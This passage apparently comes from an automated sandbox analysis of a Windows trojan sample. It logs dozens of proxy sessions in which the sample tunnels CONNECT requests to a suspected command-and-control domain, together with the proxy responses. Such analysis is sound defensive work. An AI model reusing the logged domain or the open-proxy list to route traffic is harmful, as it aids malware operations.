                                                                                Content-Length: 535
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 72 61 6a 61 6e 65 65 73 68 6d 40 67 6f 69 74 64 65 76 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at rajaneeshm@goitdev.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                404192.168.2.85082341.65.236.3519765828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.639480114 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.694915056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.781471968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.820693970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:48.897939920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:00.897841930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:12.929121017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                405192.168.2.85143872.195.101.9941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.642491102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                406192.168.2.85088645.11.95.16560495828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.656418085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                407192.168.2.851405122.116.150.290005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.658941984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                408192.168.2.850949148.72.177.90281065828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.666081905 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.694920063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.781466961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                409192.168.2.851111199.229.254.12941455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.667886019 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                410192.168.2.85144982.66.210.15981185828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.668581009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.838320971 CET131INHTTP/1.1 503 Too many open connections
                                                                                Content-Type: text/plain
                                                                                Connection: close
                                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                Data Ascii: Maximum number of open connections reached.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                411192.168.2.85143695.43.244.1541535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.675795078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                412192.168.2.85145272.195.34.4241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.676083088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                413192.168.2.851439212.127.93.18580815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.678872108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                414192.168.2.850919212.110.188.216344055828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.683455944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.695152044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.695328951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.695071936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                415192.168.2.851491104.25.194.175805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.683528900 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.777451992 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                416192.168.2.851358103.41.88.182825828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.689598083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.491796017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.695049047 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                417192.168.2.851227111.206.0.9981815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.691709995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.670959949 CET163INHTTP/1.1 200 Connection Established
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 0
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Server: eJet/1.4.2
                                                                                X-Nat-IP: 191.96.227.222


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                418192.168.2.85092837.187.77.58189365828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.701325893 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                419192.168.2.851468107.180.101.22665395828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.701761961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.116585016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.554163933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.491847038 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.382483959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                420192.168.2.851409221.134.152.7573025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.702054024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                421192.168.2.851469148.72.23.56464515828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.702711105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.194755077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.683495998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.585791111 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.398056984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.140068054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.898272991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.398257017 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:42.398332119 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                422192.168.2.85139339.105.27.3031285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.704179049 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:25.199338913 CET38INHTTP/1.1 200 OK
                                                                                content-length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                423192.168.2.851390183.89.40.23210805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.708698034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                424192.168.2.851474199.188.93.21490005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.739022970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                425192.168.2.85143543.153.133.208156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.739995956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                426192.168.2.85145185.12.214.148805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.748488903 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                427192.168.2.85148798.162.25.2341455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.749828100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                428192.168.2.8514855.9.98.14226925828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.763876915 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                429192.168.2.8515063.9.71.16731285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.800519943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.959434032 CET167INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.4.7
                                                                                Server: squid/6.0.0-20220501-re899e0c27
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                430192.168.2.851532104.16.105.198805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.800662994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.887921095 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:24 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                431192.168.2.85151098.162.25.4316545828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.800808907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                432192.168.2.85150970.166.167.38577285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.801104069 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                433192.168.2.85149751.250.2.171401865828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:24.823959112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.212269068 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 